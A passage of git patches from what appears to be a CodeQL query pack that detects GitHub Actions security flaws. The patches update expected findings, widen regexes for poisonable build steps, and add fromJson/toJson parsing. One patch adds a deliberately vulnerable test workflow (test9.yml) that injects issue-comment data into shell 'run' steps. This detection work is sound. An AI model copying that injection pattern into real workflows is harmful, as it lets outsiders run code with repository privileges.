checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/test2.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:16:9:22:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:30:9:36:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:45:9:49:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_3rd_party_action.yml:49:9:52:25 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:12:9:16:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:20:9:24:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:28:9:32:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:35:9:40:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_direct.yml:43:9:46:126 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:28:9:33:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_heuristic.yml:48:7:50:46 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential execution of untrusted code on a privileged workflow. | +| .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | Potential execution of untrusted code on a privileged workflow. | From 45d51a4d00996bec8af9cd8f2cd12891856afa59 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:29:53 +0200 Subject: [PATCH 0371/1267] Add more poisonable steps --- .../codeql/actions/security/PoisonableSteps.qll | 2 +- ql/lib/ext/config/poisonable_steps.yml | 15 +++++++++------ 2 files changed, 10 insertions(+), 7 deletions(-) diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index 4165df17a4d..c228965736d 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -29,7 +29,7 @@ class LocalScriptExecutionRunStep extends PoisonableStep, Run { LocalScriptExecutionRunStep() { exists(string line, string regexp, int group | line = this.getScript().splitAt("\n").trim() | poisonableLocalScriptsDataModel(regexp, group) and - cmd = line.regexpCapture("(^|\\b|\\s+)" + regexp, group) + cmd = line.regexpCapture(".*(^|\\b|\\s+|\\$\\(|`)" + regexp + "(\\b|\\s+|;|\\)|`|$).*", group) ) } diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index dc835e7dab2..f13a2a16d35 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -35,6 +35,9 @@ extensions: - ["npm i(nstall)?"] - ["npm run"] - ["npm ci"] + - ["pnpm i(nstall)?"] + - ["pnpm run"] + - ["pnpm ci"] - ["pre-commit"] - ["prettier"] - ["pip install -r"] @@ -54,10 +57,10 @@ extensions: extensible: poisonableLocalScriptsDataModel data: # TODO: It could also be in the form of `dir/cmd` - - ["(\\.\\/)(.*)(\\s+|;|$)", 3] - - ["(source|sh|bash|zsh|fish)\\s+(.*)(\\s+|;|$)", 3] - - ["(node)\\s+(.*)(\\.js|\\.ts)(\\s+|;|$)", 3] - - ["(python)\\s+(.*)\\.py(\\s+|;|$)", 3] - - ["(ruby)\\s+(.*)\\.rb(\\s+|;|$)", 3] - - ["(go)\\s+(.*)\\.go(\\s+|;|$)", 3] + - ["(\\.\\/)(.*)", 3] + - ["(source|sh|bash|zsh|fish)\\s+(.*)", 3] + - ["(node)\\s+(.*)(\\.js|\\.ts)", 3] + - ["(python)\\s+(.*)\\.py", 3] + - ["(ruby)\\s+(.*)\\.rb", 3] + - ["(go)\\s+(.*)\\.go", 3] From 4b01cd5be45dc8ebb161e7e55ec4e4ef7b8172c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:51:19 +0200 Subject: [PATCH 0372/1267] Support flow through fromJson --- ql/lib/codeql/actions/ast/internal/Ast.qll | 101 +++++++++++++++--- .../CWE-094/.github/workflows/test9.yml | 27 +++++ .../CWE-094/CodeInjectionCritical.expected | 17 +++ .../CWE-094/CodeInjectionMedium.expected | 13 +++ 4 files changed, 141 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 9d2a5b38206..c6569367c10 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1194,12 +1194,25 @@ string getASimpleReferenceExpression(string s, int offset) { .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) } +bindingset[s] +string getAJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\).*", _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\).*", 1) +} + /** * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability */ abstract class SimpleReferenceExpressionImpl extends ExpressionImpl { - SimpleReferenceExpressionImpl() { exists(getASimpleReferenceExpression(expression, _)) } + SimpleReferenceExpressionImpl() { + exists(getASimpleReferenceExpression(expression, _)) or + exists(getAJsonReferenceExpression(expression, _)) + } abstract string getFieldName(); @@ -1236,8 +1249,17 @@ class SecretsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; SecretsExpressionImpl() { - normalizeExpr(expression).regexpMatch(secretsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(secretsCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(secretsCtxRegex()) and + fieldName = expr.regexpCapture(secretsCtxRegex(), 1) + ) } override string getFieldName() { result = fieldName } @@ -1255,9 +1277,18 @@ class StepsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; StepsExpressionImpl() { - normalizeExpr(expression).regexpMatch(stepsCtxRegex()) and - stepId = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 1) and - fieldName = normalizeExpr(expression).regexpCapture(stepsCtxRegex(), 2) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(stepsCtxRegex()) and + stepId = expr.regexpCapture(stepsCtxRegex(), 1) and + fieldName = expr.regexpCapture(stepsCtxRegex(), 2) + ) } override string getFieldName() { result = fieldName } @@ -1287,10 +1318,19 @@ class NeedsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; NeedsExpressionImpl() { - normalizeExpr(expression).regexpMatch(needsCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = normalizeExpr(expression).regexpCapture(needsCtxRegex(), 1) and - neededJob.getLocation().getFile() = this.getLocation().getFile() + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(needsCtxRegex()) and + fieldName = expr.regexpCapture(needsCtxRegex(), 2) and + neededJob.getId() = expr.regexpCapture(needsCtxRegex(), 1) and + neededJob.getLocation().getFile() = this.getLocation().getFile() + ) } override string getFieldName() { result = fieldName } @@ -1320,9 +1360,18 @@ class JobsExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; JobsExpressionImpl() { - normalizeExpr(expression).regexpMatch(jobsCtxRegex()) and - jobId = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 1) and - fieldName = normalizeExpr(expression).regexpCapture(jobsCtxRegex(), 2) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(jobsCtxRegex()) and + jobId = expr.regexpCapture(jobsCtxRegex(), 1) and + fieldName = expr.regexpCapture(jobsCtxRegex(), 2) + ) } override string getFieldName() { result = fieldName } @@ -1370,8 +1419,17 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { string fieldName; EnvExpressionImpl() { - normalizeExpr(expression).regexpMatch(envCtxRegex()) and - fieldName = normalizeExpr(expression).regexpCapture(envCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(envCtxRegex()) and + fieldName = expr.regexpCapture(envCtxRegex(), 1) + ) } override string getFieldName() { result = fieldName } @@ -1396,8 +1454,17 @@ class MatrixExpressionImpl extends SimpleReferenceExpressionImpl { string fieldAccess; MatrixExpressionImpl() { - normalizeExpr(expression).regexpMatch(matrixCtxRegex()) and - fieldAccess = normalizeExpr(expression).regexpCapture(matrixCtxRegex(), 1) + exists(string expr | + ( + exists(getAJsonReferenceExpression(expression, _)) and + expr = normalizeExpr(expression).regexpCapture("(?i)fromjson\\((.*)\\).*", 1) + or + exists(getASimpleReferenceExpression(expression, _)) and + expr = normalizeExpr(expression) + ) and + expr.regexpMatch(matrixCtxRegex()) and + fieldAccess = expr.regexpCapture(matrixCtxRegex(), 1) + ) } override string getFieldName() { result = fieldAccess } diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml new file mode 100644 index 00000000000..6ed7db83cb2 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test9.yml @@ -0,0 +1,27 @@ +name: Test + +on: + issue_comment: + +jobs: + parse-issue: + runs-on: ubuntu-latest + outputs: + payload: ${{ steps.issue_body_parser_request.outputs.payload }} + steps: + - name: Get JSON Data out of Issue Request + uses: peter-murray/issue-body-parser-action@v2 + id: issue_body_parser_request + with: + github_token: ${{ secrets.GITHUB_TOKEN }} + issue_id: ${{ github.event.issue.number }} + payload_marker: request + fail_on_missing: false + - run: echo ${{ steps.issue_body_parser_request.outputs.payload }} + approve-or-deny-request: + runs-on: ubuntu-latest + needs: parse-issue + steps: + - run: echo ${{ needs.parse-issue.outputs.payload }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload) }} + - run: echo ${{ fromJson(needs.parse-issue.outputs.payload).version }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 1b98263c16e..ff378f93af6 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected @@ -67,6 +67,12 @@ edges | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -251,6 +257,13 @@ nodes | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -352,6 +365,10 @@ subpaths | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | ${{ steps.issue_body_parser_request.outputs.payload }} | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | ${{ needs.parse-issue.outputs.payload }} | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | ${{ fromJson(needs.parse-issue.outputs.payload) }} | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | ${{ fromJson(needs.parse-issue.outputs.payload).version }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 35887c3b370..19b72ad6b5c 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -67,6 +67,12 @@ edges | .github/workflows/test3.yml:13:9:21:2 | Uses Step: issue_body_parser_request | .github/workflows/test3.yml:11:17:11:70 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | provenance | | | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | provenance | | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | provenance | | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | provenance | | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | provenance | | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:49:20:49:56 | needs.job1.outputs['job_output'] | provenance | | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | provenance | | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | provenance | | @@ -251,6 +257,13 @@ nodes | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test9.yml:10:7:11:4 | Job outputs node [payload] | semmle.label | Job outputs node [payload] | +| .github/workflows/test9.yml:10:17:10:70 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:12:9:20:6 | Uses Step: issue_body_parser_request | semmle.label | Uses Step: issue_body_parser_request | +| .github/workflows/test9.yml:20:20:20:73 | steps.issue_body_parser_request.outputs.payload | semmle.label | steps.issue_body_parser_request.outputs.payload | +| .github/workflows/test9.yml:25:18:25:57 | needs.parse-issue.outputs.payload | semmle.label | needs.parse-issue.outputs.payload | +| .github/workflows/test9.yml:26:18:26:67 | fromJson(needs.parse-issue.outputs.payload) | semmle.label | fromJson(needs.parse-issue.outputs.payload) | +| .github/workflows/test9.yml:27:18:27:75 | fromJson(needs.parse-issue.outputs.payload).version | semmle.label | fromJson(needs.parse-issue.outputs.payload).version | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | From 7e0146d63499a15c309d0f75da286fbbd3e9dd9e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Jul 2024 23:52:01 +0200 Subject: [PATCH 0373/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 5518e074d30..320ef23e413 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.10 +version: 0.1.11 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index d4f97a32ec6..e7a98574a89 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.10 +version: 0.1.11 groups: [actions, queries] suites: codeql-suites extractor: javascript From c70fb6e9114303784e8761cebfe9c7e8927ac4b2 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Jul 2024 12:25:24 +0200 Subject: [PATCH 0374/1267] Consider toJson as a sanitizer for Code Injection in JS --- ql/lib/codeql/actions/ast/internal/Ast.qll | 30 +++++++++++++++++-- .../Security/CWE-094/CodeInjectionCritical.ql | 6 ++++ .../Security/CWE-094/CodeInjectionMedium.ql | 6 ++++ .../CWE-094/.github/workflows/test9.yml | 12 ++++++++ .../CWE-094/CodeInjectionCritical.expected | 7 +++++ .../CWE-094/CodeInjectionMedium.expected | 4 +++ 6 files changed, 63 insertions(+), 2 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index c6569367c10..7c7c6216b1b 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1194,14 +1194,40 @@ string getASimpleReferenceExpression(string s, int offset) { .regexpCapture("([A-Za-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)", 1) } +bindingset[s] +string getAFromJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)fromjson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)fromjson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + +bindingset[s] +string getAToJsonReferenceExpression(string s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.trim() + .regexpFind("(?i)tojson\\([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + _, offset) + .regexpCapture("(?i)tojson\\(([a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]+)\\)[a-z0-9'\"_\\[\\]\\*\\(\\)\\.\\-]*", + 1) +} + bindingset[s] string getAJsonReferenceExpression(string s, int offset) { // We use `regexpFind` to obtain *all* matches of `${{...}}`, // not just the last (greedy match) or first (reluctant match). result = s.trim() - 